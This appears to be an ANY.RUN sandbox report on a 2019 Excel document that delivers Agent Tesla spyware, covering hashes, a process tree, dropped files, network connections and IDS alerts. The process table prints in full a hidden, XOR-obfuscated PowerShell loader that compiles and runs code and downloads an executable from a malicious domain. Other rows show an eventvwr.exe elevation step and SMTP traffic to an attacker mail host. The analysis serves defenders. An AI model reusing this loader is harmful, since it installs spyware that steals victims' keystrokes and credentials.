File name: | 1dd4ac4925b58a2833b5c8969e7c5b5ff5ec590b376d520e6c0a114b941e2075.xls |
Full analysis: | https://app.any.run/tasks/f9743d7a-ed98-433a-bc20-b18a4f83d0a8 |
Verdict: | Malicious activity |
Threats: | Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold. |
Analysis date: | July 17, 2019, 13:25:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: v9b66, Subject: lf338, Last Saved By: USER, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jun 13 09:28:30 2019, Last Saved Time/Date: Thu Jun 13 09:37:23 2019, Security: 0 |
MD5: | 8E0B8B5200E879D7A4A62DF5EA30253A |
SHA1: | 50C9DEA7C3B2F396F22612F14DAE00880CEFFA9A |
SHA256: | 1DD4AC4925B58A2833B5C8969E7C5B5FF5EC590B376D520E6C0A114B941E2075 |
SSDEEP: | 6144:HY35qAOJl/YrLYz+WrNhZF+E+W2RnAaI6Kcx0oqvJI3uBjTOgoLLkAEwPlP:FcgIwjTOpP3LPl |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
CompObjUserType: | Microsoft Office Excel 2003 Worksheet |
---|---|
CompObjUserTypeLen: | 38 |
HeadingPairs: |
|
TitleOfParts: |
|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 12 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
ModifyDate: | 2019:06:13 08:37:23 |
CreateDate: | 2019:06:13 08:28:30 |
Software: | Microsoft Excel |
LastModifiedBy: | USER |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | lf338 |
Title: | v9b66 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2844 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
692 | powershell -WindowStyle Hidden function rf2d7d2 { param($s1a66c) $a84e86 = 'tf2825'; $d91ec = ''; for ($i = 0; $i -lt $s1a66c.length; $i+=2) { $x27f33d = [convert]::ToByte($s1a66c.Substring($i, 2), 16); $d91ec += [char]($x27f33d -bxor $a84e86[($i / 2) % $a84e86.length]); } return $d91ec; } $xbb45 = '01155b565515271f414c57584f6b384d415c1a01126b4b4600035f1660401a125b55571b3d08465d405a0435574a445c170341033f3f01155b565515271f414c57585a225b59555b1b15465151464f6b384d415c1a01126b4b4600035f167b7a4f6b384d415c1a01126b4b4600035f167c50005d3f324240160a5b5b12561807414b124c115754593f3f0f6b3818121554461218126e300a5e715f451b144610105e11145c5d5e0646441e18775b00144b685d5c1a121205121733034668405a1727565c4050071510116f387e4612181215544612484757180f5118414115125b5b12500c12574a5c153d08466846475402070c540d404e7b5646650014125b53071003570f1e15071240515c525411045a0003414f09353815544612181215543d76545e7c19165d4a461d560d574a5c501855001a1e153108464a4b651b0f5c4c120854447e575351380f504a53470d441b653f3f5446121812155446424d50591d05124b4654000f5118574d00034056127c1a12624c40150e50545951015c15464a5b5b13464b01540311500a1109387e4612181215544612637659182f5f485d47004e105357471a035e0b00175846775646470d365d515c41545b121a645c061247595e650609465d5141564f6f3538155446121812155416475a5e5c1746414c53411d05125d4a4111145c18505a1b0a125e510243551a715c41241240185a0c47540b1412603d08466846475404005b045446041e18475c1a12124b005015575714125a0112124d5b5b0046420d05044351071109387e4612181215544612637659182f5f485d47004e107357471a035e0b001b100a5e1a1e153108464a4b651b0f5c4c12085444604c5e781b10577557581b144b1a1e152703467453460023404a5d47545b125e535907031b653f3f5446121812155446414c53411d05125d4a4111145c18445a1d02124e0a5445051a715c4124124018535011510414127c1a12624c4015185304000519540f5c4c124c4d53045c1b0e796c3f321215544612181215041350545b5654154659465c17465b5646150405500b531d5d6b3818121554461218124e796c1218121554461218121554467b5646650014124e545617531205124f4200535b061d0600005c0551464e100907051652030d0304175303090a0515441b1109387e4612181215544612181215540f54181a431205510d120849467b56466500141c6257471b4f3f3212155446121812155446121849387e46121812155446121812155446121812521b125d184403415f565909387e4612181215544612181215541b3f323f3f5446121812155446121812153d08466846475415515c0601545b125c0701125e061044531705071412471254560f56075c44010d02574057070904044150030d020d4356065c0701415503090301564f1b033f3f5446121812155446121812151d0012104156105206180f08542f5c4c62410648685d405a5d6b38181215544612181215544612433f3f54461218121554461218121554461218555a0009124e04004d0253033f3f544612181215544612181215096b383538155446121812155446121812603d08466846475413570f0350545b1210677c1a12624c401c415d3f32121554461218121554461218475c1a1212530751115053180f15445d3f321215544612181215544612185b53544e135e510243551a4b515140521e1847504357571412050c520214125a011212530751115053111b387e4612181215544612181215541d3f32121554461218121554461218121554465557465a5410040d0b51155d3f321215544612181215544612184f387e461218121554461218121554244b4c576e2946510a570d4d041205124e54564a0b031954564a5e541954564a010215095d3f321215544612181215544612187b5b0036464a125115540b0a1208542b534a415d150a1c795e591b057a7f5e5a16075e10011c4f6b38181215544612181215544612755347070e53541c761b164b105107115e0b5a1e15444a125c53074d541e18011c4f6b381812155446121812155446124e0a5445051a565742542f5c4c6241064e415b5601404866577b5b005006101b155f460240020545041b14125115540b0a1e15474f093538387e10040d0b51155c3f323b3c7d31575a71591d035c4c1254170756000b03545b125657425431575a71591d035c4c1a1c4f6b38313b3c071240515c525403065e5100545b127d5c431d145d565f501a121c7f574132095e5c5747240746501a701a105b4a5d5b19035c4c1c6604035151535932095e5c57475a2742485e5c170746515d5b300746591b155f4610646e5a1203565e07025646191840534602055c001d5653530801011553561a1b0e796c3b313b54170756000b035a225d4f5c591b07567e5b59114e405e00514302001010041757000c04014c560a0953001657070d56001753500d0a041656000d50011653060c050441560a0d03001057510d040446520b0805044352030c00044556010d04044253050c560445441b1412504000510d1b0e796c3b313b650609515d41462712534a467c1a005d18420c4c040b5c12085408574f12650609515d41462712534a467c1a005d1057011205071109387e6f3b3162471b05574b411b2712534a461d045f0a5a0b515d5d3f323f3f5446121812155446121812150603464d405b545609353815544612181215541b3f323b3c041350545b5654154659465c1746414c405c1a01124a54071051560a1a4600145b5655150103560904075d6b3818121554461218124e796c3b313b4600145b5655151707005c575043460f18104112540a0a07174f6b381812155446121812155446124b46471d08551848031207510c12085435464a5b5b1348775542410d5d3f32121554461218121554461218545a06461a515c41540f120512054f465b180e150103560904075a2a575655411c5d1251121e494600113f3f5446121812155446121812150f6b3818121554461218121554461218121554044b4c57151053065e0a01545b127b5d5b0203404c1c611b244b4c571d0103560904075a35475a4141060f5c5f1a5c584600111e1545501b033f3f5446121812155446121812155446121848031207510c121e49461a5b5a54064f1a5c0701125e06186c151707005c5750433d1a51121a54541b1817151707005c575043487e5d5c52000e6f1109387e4612181215544612181215541b3f323f3f5446121812155446121812150603464d405b541c045e5356405d3f321215544612181215096b3845'; $xbb452 = rf2d7d2($xbb45); Add-Type -TypeDefinition $xbb452; [ye1fa]::pcb3a(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1692 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\kkz6tvaz.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3212 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESF62A.tmp" "c:\Users\admin\AppData\Local\Temp\CSCF629.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) | ||||
2752 | "C:\Users\admin\AppData\Roaming\ofedf57.exe" | C:\Users\admin\AppData\Roaming\ofedf57.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2520 | "C:\Windows\System32\eventvwr.exe" | C:\Windows\System32\eventvwr.exe | — | ofedf57.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Event Viewer Snapin Launcher Exit code: 3221226540 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3456 | "C:\Windows\System32\eventvwr.exe" | C:\Windows\System32\eventvwr.exe | ofedf57.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Event Viewer Snapin Launcher Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2372 | "C:\Users\admin\AppData\Roaming\ofedf57.exe" | C:\Users\admin\AppData\Roaming\ofedf57.exe | eventvwr.exe | |
User: admin Integrity Level: HIGH Exit code: 0 | ||||
3532 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | ofedf57.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft .NET Services Installation Utility Version: 2.0.50727.5420 (Win7SP1.050727-5400) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2844 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRE8AC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
692 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8BWEIQPYDPF15T6UC3I9.temp | — | |
MD5:— | SHA256:— | |||
1692 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSCF629.tmp | — | |
MD5:— | SHA256:— | |||
1692 | csc.exe | C:\Users\admin\AppData\Local\Temp\kkz6tvaz.pdb | — | |
MD5:— | SHA256:— | |||
3212 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESF62A.tmp | — | |
MD5:— | SHA256:— | |||
1692 | csc.exe | C:\Users\admin\AppData\Local\Temp\kkz6tvaz.dll | — | |
MD5:— | SHA256:— | |||
1692 | csc.exe | C:\Users\admin\AppData\Local\Temp\kkz6tvaz.out | — | |
MD5:— | SHA256:— | |||
692 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF10f2be.TMP | binary | |
MD5:4B92A079D7F4DFA0DFE9125E60FE7814 | SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04 | |||
692 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:4B92A079D7F4DFA0DFE9125E60FE7814 | SHA256:E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04 | |||
692 | powershell.exe | C:\Users\admin\AppData\Local\Temp\kkz6tvaz.cmdline | text | |
MD5:A983B3BB755E320B1FA98D4BA3055FA6 | SHA256:47EBB057277423F5B338FB266960D802C1806913C60E7D4EE4D4DC1C3FFCACFE |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
692 | powershell.exe | GET | 200 | 185.26.122.68:80 | http://sodimodisfrance.cf/5/sweed.exe | RU | executable | 1.46 Mb | malicious |
3532 | RegSvcs.exe | GET | 200 | 34.233.102.38:80 | http://checkip.amazonaws.com/ | US | text | 12 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3532 | RegSvcs.exe | 198.54.125.61:26 | mail.sweeddehacklord.us | Namecheap, Inc. | US | malicious |
3532 | RegSvcs.exe | 34.233.102.38:80 | checkip.amazonaws.com | Amazon.com, Inc. | US | shared |
692 | powershell.exe | 185.26.122.68:80 | sodimodisfrance.cf | Hostland LTD | RU | suspicious |
Domain | IP | Reputation |
---|---|---|
sodimodisfrance.cf |
| malicious |
mail.sweeddehacklord.us |
| malicious |
dns.msftncsi.com |
| shared |
checkip.amazonaws.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .cf Domain |
692 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
692 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3532 | RegSvcs.exe | A Network Trojan was detected | MALWARE [PTsecurity] AgentTesla IP Check |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|